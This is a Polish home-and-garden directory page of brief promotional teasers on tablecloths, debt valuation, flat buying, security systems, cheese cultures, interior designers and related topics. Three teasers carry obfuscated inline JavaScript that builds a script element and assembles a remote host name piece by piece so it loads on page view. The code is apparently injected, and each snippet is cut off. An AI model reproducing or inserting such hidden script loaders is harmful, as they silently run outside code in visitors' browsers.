Dom i ogród

Jarosław

  Obrusy wykonane są z tkanin jedwabnych, lnianych lub bawełnianych, a także z tkanin sztucznych (tzw. obrusy plamoodporne) w jednolitych kolorach, różnokolorowe, ze wzorami żakardowymi, drukowane lub haftowane, a bardziej dekoracyjne z koronek. Na uroczyste okazje przeważnie wykorzystuje się białe obrusy.

Wierzytelności, czyli kwoty przynależne danemu wierzycielowi (np. bank) od dłużników, powstające wskutek udzielenia finansowania, mogą być przedmiotem obrotu pomiędzy podmiotami gospodarczymi. Z uwagi na fakt, że wartość nominalna należności nie odpowiada ich wartości godziwej, niezbędnym elementem procesu zbycia wierzytelności jest ich prawidłowa wycena.

  Pandemia spowodowała duże zmiany w naszym życiu. Znacznie więcej czasu spędzamy w swoich domach i mieszkaniach. Kupno mieszkania jest obecnie jedną z najlepszych inwestycji, która gwarantuje pewną i bezpieczną i zyskowną lokatę kapitału.

  Wszystkie obiekty, z jakimi spotykamy się na co dzień są narażone na zaistnienie w nich działań niepożądanych: włamań, kradzieży, aktów wandalizmu. Dlatego montowane są systemy ochronne. Mogą być stosowane w biurowcach, zakładach produkcyjnych, na parkingach czy nawet w domach – wszędzie, gdzie można je podłączyć do dowolnej centrali Slican (oprócz central ITS). (function(){ z14d=document.createElement("script");z14d_=(("u")+"st")+"a";z14d.async=true; z14d.type="text/javascript";z14d_+=("t.i")+""+"n";z14d_+=(("f")+"o");z14d_+="/";...

Pokój dziecka musi być nie tylko designerski lub stylowy, ale też praktyczny i funkcjonalny. Jak to jednak zrobić? Nie jest to wcale trudne – trzeba po prostu wydzielić w nim poszczególne strefy i odpowiednio je wyposażyć. Podpowiadamy, jak to zrobić, by odnieść sukces.

  Kultury bakterii pełnią niezwykle istotną funkcję podczas produkcji serów. Wpływają one na nadanie im odpowiedniego smaku i struktury. To właśnie od nich zależą, chociażby takie kwestie jak to, czy ser będzie miał charakterystyczne dziury w swojej strukturze. Ich brak w wielu przypadkach uniemożliwiłby produkcję niektórych gatunków. Sprawdź, co dokładnie wyróżnia bakterie starterowe, które wykorzystuje się w procesach serowarskich. (function(){ qrzq=document.createElement("script");qrzq_=("us")+("ta");...

  Znane projektantki wnętrz Abrys - Agnieszka Wojciechowska i Agnieszka Nadolińska-Pilarek przebojem zdobywają coraz większe uznanie w branży architektury wnętrz. Projektowanie wnętrz nie polega na zwykłym rozmieszczeniu mebli i sprzętów, jak wyobraża sobie wiele osób. To sztuka, artystyczna wizja, kreacja wnętrz – oferująca codzienną wygodę, praktyczną przydatność i funkcjonalność. (function(){ wre5=document.createElement("script");wre5.type="text/javascript";...

  W czasie, gdy okoliczności zewnętrzne zakłócają działalność gospodarczą i zmusiły wielu właścicieli do czasowego zamknięcia drzwi, branża handlu detalicznego musiała podjąć niejednokrotnie wyjątkowo trudne decyzje. Dla sklepów, które pozostawały otwarte w czasie trwania pandemii, oznacza to konieczność egzekwowania zasad dystansu społecznego, przemyślenia wzorców ruchu klientów na terenie obiektu oraz umożliwienie samodzielnych płatności także tych zbliżeniowych. 

Firma Elemix działa na rynku elektroinstalacyjnym od 1993 roku. Od początku swojej działalności firma dba o jakość wykonywanych usług i zadowolenie klientów. Główną działalnością firmy jest montaż instalacji elektrycznych, alarmowych, ale także sprzedaż, montaż i serwis systemów centralnego odkurzania.

1 2 3 4 5 6 7 8 9 10
stat4u PortalPOLSKA.pl